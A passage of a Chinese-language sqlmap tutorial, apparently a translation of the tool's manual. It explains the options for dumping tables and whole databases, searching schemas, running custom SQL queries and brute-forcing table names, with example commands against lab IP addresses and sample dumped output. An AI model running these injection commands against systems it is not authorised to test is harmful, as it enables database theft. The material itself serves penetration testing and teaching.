Roman';\">\u4f7f\u7528<span>-D,-T<\/span><span>\u53c2\u6570\u6307\u5b9a\u60f3\u8981\u83b7\u53d6\u54ea\u4e2a\u5e93\u7684\u54ea\u4e2a\u8868\uff0c\u4e0d\u9002\u7528<\/span><span>-D<\/span><span>\u53c2\u6570\u65f6\uff0c\u9ed8\u8ba4\u4f7f\u7528\u5f53\u524d\u5e93\u3002<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u5217\u4e3e\u4e00\u4e2a<span>Firebird<\/span><span>\u7684\u4f8b\u5b50\uff1a<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p17\">\n\t<span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">$&nbsp;python&nbsp;sqlmap.py&nbsp;-u&nbsp;&#8220;http:\/\/192.168.136.131\/sqlmap\/firebird\/get_int.php?id=1&#8221;&nbsp;&#8211;dump&nbsp;-T&nbsp;users<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[&#8230;]<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">Database:&nbsp;Firebird_masterdb<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">Table:&nbsp;USERS<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[4&nbsp;entries]<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">+&#8212;-+&#8212;&#8212;&#8211;+&#8212;&#8212;&#8212;&#8212;+<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">|&nbsp;ID&nbsp;|&nbsp;NAME&nbsp;&nbsp;&nbsp;|&nbsp;SURNAME&nbsp;&nbsp;&nbsp;&nbsp;|<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">+&#8212;-+&#8212;&#8212;&#8211;+&#8212;&#8212;&#8212;&#8212;+<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">|&nbsp;1&nbsp;&nbsp;|&nbsp;luther&nbsp;|&nbsp;blisset&nbsp;&nbsp;&nbsp;&nbsp;|<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">|&nbsp;2&nbsp;&nbsp;|&nbsp;fluffy&nbsp;|&nbsp;bunny&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;|<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">|&nbsp;3&nbsp;&nbsp;|&nbsp;wu&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;|&nbsp;ming&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;|<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">|&nbsp;4&nbsp;&nbsp;|&nbsp;NULL&nbsp;&nbsp;&nbsp;|&nbsp;nameisnull&nbsp;|<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">+&#8212;-+&#8212;&#8212;&#8211;+&#8212;&#8212;&#8212;&#8212;+<\/span><span style=\"font-size:12.0000pt;font-family:'\u5b8b\u4f53';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u53ef\u4ee5\u83b7\u53d6\u6307\u5b9a\u5e93\u4e2d\u7684\u6240\u6709\u8868\u7684\u5185\u5bb9\uff0c\u53ea\u7528<span>-dump<\/span><span>\u8ddf<\/span><span>-D<\/span><span>\u53c2\u6570\uff08\u4e0d\u4f7f\u7528<\/span><span>-T<\/span><span>\u4e0e<\/span><span>-C<\/span><span>\u53c2\u6570\uff09\u3002<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u4e5f\u53ef\u4ee5\u7528<span>-dump<\/span><span>\u8ddf<\/span><span>-C<\/span><span>\u83b7\u53d6\u6307\u5b9a\u7684\u5b57\u6bb5\u5185\u5bb9\u3002<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">sqlmap<span>\u4e3a\u6bcf\u4e2a\u8868\u751f\u6210\u4e86\u4e00\u4e2a<\/span><span>CSV<\/span><span>\u6587\u4ef6\u3002<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u5982\u679c\u4f60\u53ea\u60f3\u83b7\u53d6\u4e00\u6bb5\u6570\u636e\uff0c\u53ef\u4ee5\u4f7f\u7528<span>&#8211;start<\/span><span>\u548c<\/span><span>&#8211;stop<\/span><span>\u53c2\u6570\uff0c\u4f8b\u5982\uff0c\u4f60\u53ea\u60f3\u83b7\u53d6\u7b2c\u4e00\u6bb5\u6570\u636e\u53ef<\/span><span>hi<\/span><span>\u4f7f\u7528<\/span><span>&#8211;stop&nbsp;1<\/span><span>\uff0c\u5982\u679c\u60f3\u83b7\u53d6\u7b2c\u4e8c\u6bb5\u4e0e\u7b2c\u4e09\u6bb5\u6570\u636e\uff0c\u4f7f\u7528\u53c2\u6570&nbsp;<\/span><span>&#8211;start&nbsp;1&nbsp;&#8211;stop&nbsp;3<\/span><span>\u3002<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u4e5f\u53ef\u4ee5\u7528<span>&#8211;first<\/span><span>\u4e0e<\/span><span>&#8211;last<\/span><span>\u53c2\u6570\uff0c\u83b7\u53d6\u7b2c\u51e0\u4e2a\u5b57\u7b26\u5230\u7b2c\u51e0\u4e2a\u5b57\u7b26\u7684\u5185\u5bb9\uff0c\u5982\u679c\u4f60\u60f3\u83b7\u53d6\u5b57\u6bb5\u4e2d\u5730\u4e09\u4e2a\u5b57\u7b26\u5230\u7b2c\u4e94\u4e2a\u5b57\u7b26\u7684\u5185\u5bb9\uff0c\u4f7f\u7528<\/span><span>&#8211;first&nbsp;3&nbsp;&#8211;last&nbsp;5<\/span><span>\uff0c\u53ea\u5728\u76f2\u6ce8\u7684\u65f6\u5019\u4f7f\u7528\uff0c\u56e0\u4e3a\u5176\u4ed6\u65b9\u5f0f\u53ef\u4ee5\u51c6\u786e\u7684\u83b7\u53d6\u6ce8\u5165\u5185\u5bb9\uff0c\u4e0d\u9700\u8981\u4e00\u4e2a\u5b57\u7b26\u4e00\u4e2a\u5b57\u7b26\u7684\u731c\u89e3\u3002<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<h3><span class=\"ez-toc-section\" id=\"%E8%8E%B7%E5%8F%96%E6%89%80%E6%9C%89%E6%95%B0%E6%8D%AE%E5%BA%93%E8%A1%A8%E7%9A%84%E5%86%85%E5%AE%B9\"><\/span>\n\t<span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\">\u83b7\u53d6\u6240\u6709\u6570\u636e\u5e93\u8868\u7684\u5185\u5bb9<\/span><span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\"><\/span><br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u53c2\u6570\uff1a<span>&#8211;dump-all,&#8211;exclude-sysdbs<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u4f7f\u7528<span>&#8211;dump-all<\/span><span>\u53c2\u6570\u83b7\u53d6\u6240\u6709\u6570\u636e\u5e93\u8868\u7684\u5185\u5bb9\uff0c\u53ef\u540c\u65f6\u52a0\u4e0a<\/span><span>&#8211;exclude-sysdbs<\/span><span>\u53ea\u83b7\u53d6\u7528\u6237\u6570\u636e\u5e93\u7684\u8868\uff0c\u9700\u8981\u6ce8\u610f\u5728&nbsp;<\/span><span>Microsoft&nbsp;SQL&nbsp;Server<\/span><span>\u4e2d<\/span><span>master<\/span><span>\u6570\u636e\u5e93\u6ca1\u6709\u8003\u8651\u6210\u4e3a\u4e00\u4e2a\u7cfb\u7edf\u6570\u636e\u5e93\uff0c\u56e0\u4e3a\u6709\u7684\u7ba1\u7406\u5458\u4f1a\u628a\u4ed6\u5f53\u521d\u7528\u6237\u6570\u636e\u5e93\u4e00\u6837\u6765\u4f7f\u7528\u5b83\u3002<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<h3><span class=\"ez-toc-section\" id=\"%E6%90%9C%E7%B4%A2%E5%AD%97%E6%AE%B5%EF%BC%8C%E8%A1%A8%EF%BC%8C%E6%95%B0%E6%8D%AE%E5%BA%93\"><\/span>\n\t<span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\">\u641c\u7d22\u5b57\u6bb5\uff0c\u8868\uff0c\u6570\u636e\u5e93<\/span><span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\"><\/span><br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u53c2\u6570\uff1a<span>&#8211;search,-C,-T,-D<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">&#8211;search<span>\u53ef\u4ee5\u7528\u6765\u5bfb\u627e\u7279\u5b9a\u7684\u6570\u636e\u5e93\u540d\uff0c\u6240\u6709\u6570\u636e\u5e93\u4e2d\u7684\u7279\u5b9a\u8868\u540d\uff0c\u6240\u6709\u6570\u636e\u5e93\u8868\u4e2d\u7684\u7279\u5b9a\u5b57\u6bb5\u3002<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u53ef\u4ee5\u5728\u4e00\u4e0b\u4e09\u79cd\u60c5\u51b5\u4e0b\u4f7f\u7528\uff1a<\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p17\">\n\t<span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">-C<span>\u540e\u8ddf\u7740\u7528\u9017\u53f7\u5206\u5272\u7684\u5217\u540d\uff0c\u5c06\u4f1a\u5728\u6240\u6709\u6570\u636e\u5e93\u8868\u4e2d\u641c\u7d22\u6307\u5b9a\u7684\u5217\u540d\u3002<\/span><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">-T<span>\u540e\u8ddf\u7740\u7528\u9017\u53f7\u5206\u5272\u7684\u8868\u540d\uff0c\u5c06\u4f1a\u5728\u6240\u6709\u6570\u636e\u5e93\u4e2d\u641c\u7d22\u6307\u5b9a\u7684\u8868\u540d<\/span><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">-D<span>\u540e\u8ddf\u7740\u7528\u9017\u53f7\u5206\u5272\u7684\u5e93\u540d\uff0c\u5c06\u4f1a\u5728\u6240\u6709\u6570\u636e\u5e93\u4e2d\u641c\u7d22\u6307\u5b9a\u7684\u5e93\u540d\u3002<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'\u5b8b\u4f53';\"><\/span>\n<\/p>\n<h3><span class=\"ez-toc-section\" id=\"%E8%BF%90%E8%A1%8C%E8%87%AA%E5%AE%9A%E4%B9%89%E7%9A%84SQL%E8%AF%AD%E5%8F%A5\"><\/span>\n\t<span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\">\u8fd0\u884c\u81ea\u5b9a\u4e49\u7684SQL\u8bed\u53e5<\/span><span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\"><\/span><br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u53c2\u6570\uff1a<span>&#8211;sql-query,&#8211;sql-shell<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">sqlmap<span>\u4f1a\u81ea\u52a8\u68c0\u6d4b\u786e\u5b9a\u4f7f\u7528\u54ea\u79cd<\/span><span>SQL<\/span><span>\u6ce8\u5165\u6280\u672f\uff0c\u5982\u4f55\u63d2\u5165\u68c0\u7d22\u8bed\u53e5\u3002<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u5982\u679c\u662f<span>SELECT<\/span><span>\u67e5\u8be2\u8bed\u53e5\uff0c<\/span><span>sqlap<\/span><span>\u5c06\u4f1a\u8f93\u51fa\u7ed3\u679c\u3002\u5982\u679c\u662f\u901a\u8fc7<\/span><span>SQL<\/span><span>\u6ce8\u5165\u6267\u884c\u5176\u4ed6\u8bed\u53e5\uff0c\u9700\u8981\u6d4b\u8bd5\u662f\u5426\u652f\u6301\u591a\u8bed\u53e5\u6267\u884c<\/span><span>SQL<\/span><span>\u8bed\u53e5\u3002<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u5217\u4e3e\u4e00\u4e2a<span>Mircrosoft&nbsp;SQL&nbsp;Server&nbsp;2000<\/span><span>\u7684\u4f8b\u5b50\uff1a<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p17\">\n\t<span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">$&nbsp;python&nbsp;sqlmap.py&nbsp;-u&nbsp;&#8220;http:\/\/192.168.136.131\/sqlmap\/mssql\/get_int.php?id=1&#8221;&nbsp;&#8211;sql-query&nbsp;&#8220;SELECT&nbsp;&#8216;foo'&#8221;&nbsp;-v&nbsp;1<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">&nbsp;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[&#8230;]<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[hh:mm:14]&nbsp;[INFO]&nbsp;fetching&nbsp;SQL&nbsp;SELECT&nbsp;query&nbsp;output:&nbsp;&#8216;SELECT&nbsp;&#8216;foo&#8221;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[hh:mm:14]&nbsp;[INFO]&nbsp;retrieved:&nbsp;foo<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">SELECT&nbsp;&#8216;foo&#8217;:&nbsp;&nbsp;&nbsp;&nbsp;&#8216;foo&#8217;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">&nbsp;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">$&nbsp;python&nbsp;sqlmap.py&nbsp;-u&nbsp;&#8220;http:\/\/192.168.136.131\/sqlmap\/mssql\/get_int.php?id=1&#8221;&nbsp;&#8211;sql-query&nbsp;&#8220;SELECT&nbsp;&#8216;foo&#8217;,&nbsp;&#8216;bar'&#8221;&nbsp;-v&nbsp;2<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">&nbsp;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[&#8230;]<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[hh:mm:50]&nbsp;[INFO]&nbsp;fetching&nbsp;SQL&nbsp;SELECT&nbsp;query&nbsp;output:&nbsp;&#8216;SELECT&nbsp;&#8216;foo&#8217;,&nbsp;&#8216;bar&#8221;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[hh:mm:50]&nbsp;[INFO]&nbsp;the&nbsp;SQL&nbsp;query&nbsp;provided&nbsp;has&nbsp;more&nbsp;than&nbsp;a&nbsp;field.&nbsp;sqlmap&nbsp;will&nbsp;now&nbsp;unpack&nbsp;it&nbsp;into&nbsp;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">distinct&nbsp;queries&nbsp;to&nbsp;be&nbsp;able&nbsp;to&nbsp;retrieve&nbsp;the&nbsp;output&nbsp;even&nbsp;if&nbsp;we&nbsp;are&nbsp;going&nbsp;blind<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[hh:mm:50]&nbsp;[DEBUG]&nbsp;query:&nbsp;SELECT&nbsp;ISNULL(CAST((CHAR(102)+CHAR(111)+CHAR(111))&nbsp;AS&nbsp;VARCHAR(8000)),&nbsp;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">(CHAR(32)))<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[hh:mm:50]&nbsp;[INFO]&nbsp;retrieved:&nbsp;foo<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[hh:mm:50]&nbsp;[DEBUG]&nbsp;performed&nbsp;27&nbsp;queries&nbsp;in&nbsp;0&nbsp;seconds<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[hh:mm:50]&nbsp;[DEBUG]&nbsp;query:&nbsp;SELECT&nbsp;ISNULL(CAST((CHAR(98)+CHAR(97)+CHAR(114))&nbsp;AS&nbsp;VARCHAR(8000)),&nbsp;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">(CHAR(32)))<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[hh:mm:50]&nbsp;[INFO]&nbsp;retrieved:&nbsp;bar<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[hh:mm:50]&nbsp;[DEBUG]&nbsp;performed&nbsp;27&nbsp;queries&nbsp;in&nbsp;0&nbsp;seconds<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">SELECT&nbsp;&#8216;foo&#8217;,&nbsp;&#8216;bar&#8217;:&nbsp;&nbsp;&nbsp;&nbsp;&#8216;foo,&nbsp;bar&#8217;<\/span><span style=\"font-size:12.0000pt;font-family:'\u5b8b\u4f53';\"><\/span>\n<\/p>\n<h2><span class=\"ez-toc-section\" id=\"%E7%88%86%E7%A0%B4\"><\/span>\n\t<span style=\"font-weight:bold;font-size:18.0000pt;font-family:'\u5b8b\u4f53';\">\u7206\u7834<\/span><span style=\"font-weight:bold;font-size:18.0000pt;font-family:'\u5b8b\u4f53';\"><\/span><br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h2>\n<p class=\"p0\">\n\t<span style=\"font-size:10.5000pt;font-family:'Times New Roman';\">&nbsp;<\/span>\n<\/p>\n<h3><span class=\"ez-toc-section\" id=\"%E6%9A%B4%E5%8A%9B%E7%A0%B4%E8%A7%A3%E8%A1%A8%E5%90%8D\"><\/span>\n\t<span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\">\u66b4\u529b\u7834\u89e3\u8868\u540d<\/span><span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\"><\/span><br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u53c2\u6570\uff1a<span>&#8211;common-tables<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u5f53\u4f7f\u7528<span>&#8211;tables<\/span><span>\u65e0\u6cd5\u83b7\u53d6\u5230\u6570\u636e\u5e93\u7684\u8868\u65f6\uff0c\u53ef\u4ee5\u4f7f\u7528\u6b64\u53c2\u6570\u3002<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u901a\u5e38\u662f\u5982\u4e0b\u60c5\u51b5\uff1a<\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p17\">\n\t<span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">1<span>\u3001<\/span><span>MySQL<\/span><span>\u6570\u636e\u5e93\u7248\u672c\u5c0f\u4e8e<\/span><span>5.0<\/span><span>\uff0c\u6ca1\u6709<\/span><span>information_schema<\/span><span>\u8868\u3002<\/span><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">2<span>\u3001\u6570\u636e\u5e93\u662f<\/span><span>Microssoft&nbsp;Access<\/span><span>\uff0c\u7cfb\u7edf\u8868<\/span><span>MSysObjects<\/span><span>\u662f\u4e0d\u53ef\u8bfb\u7684\uff08\u9ed8\u8ba4\uff09\u3002<\/span><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">3<span>\u3001\u5f53\u524d\u7528\u6237\u6ca1\u6709\u6743\u9650\u8bfb\u53d6\u7cfb\u7edf\u4e2d\u4fdd\u5b58\u6570\u636e\u7ed3\u6784\u7684\u8868\u7684\u6743\u9650\u3002<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'\u5b8b\u4f53';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u66b4\u529b\u7834\u89e3\u7684\u8868\u5728<span>txt\/common-tables.txt<\/span><span>\u6587\u4ef6\u4e2d\uff0c\u4f60\u53ef\u4ee5\u81ea\u5df1\u6dfb\u52a0\u3002<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u5217\u4e3e\u4e00\u4e2a<span>MySQL&nbsp;4.1<\/span><span>\u7684\u4f8b\u5b50\uff1a<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p17\">\n\t<span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">$&nbsp;python&nbsp;sqlmap.py&nbsp;-u&nbsp;&#8220;http:\/\/192.168.136.129\/mysql\/get_int_4.php?id=1&#8221;&nbsp;&#8211;common-tables&nbsp;-D&nbsp;testdb&nbsp;&#8211;banner<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">&nbsp;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[&#8230;]<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[hh:mm:39]&nbsp;[INFO]&nbsp;testing&nbsp;MySQL<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[hh:mm:39]&nbsp;[INFO]&nbsp;confirming&nbsp;MySQL<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[hh:mm:40]&nbsp;[INFO]&nbsp;the&nbsp;back-end&nbsp;DBMS&nbsp;is&nbsp;MySQL<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[hh:mm:40]&nbsp;[INFO]&nbsp;fetching&nbsp;banner<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">web&nbsp;server&nbsp;operating&nbsp;system:&nbsp;Windows<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">web&nbsp;application&nbsp;technology:&nbsp;PHP&nbsp;5.3.1,&nbsp;Apache&nbsp;2.2.14<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">back-end&nbsp;DBMS&nbsp;operating&nbsp;system:&nbsp;Windows<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">back-end&nbsp;DBMS:&nbsp;MySQL&nbsp;&lt;&nbsp;5.0.0<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">banner:&nbsp;&nbsp;&nbsp;&nbsp;&#8216;4.1.21-community-nt&#8217;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">&nbsp;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[hh:mm:40]&nbsp;[INFO]&nbsp;checking&nbsp;table&nbsp;existence&nbsp;using&nbsp;items&nbsp;from&nbsp;&#8216;\/software\/sqlmap\/txt\/common-tables.txt&#8217;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[hh:mm:40]&nbsp;[INFO]&nbsp;adding&nbsp;words&nbsp;used&nbsp;on&nbsp;web&nbsp;page&nbsp;to&nbsp;the&nbsp;check&nbsp;list<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">please&nbsp;enter&nbsp;number&nbsp;of&nbsp;threads?&nbsp;[Enter&nbsp;for&nbsp;1&nbsp;(current)]&nbsp;8<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier 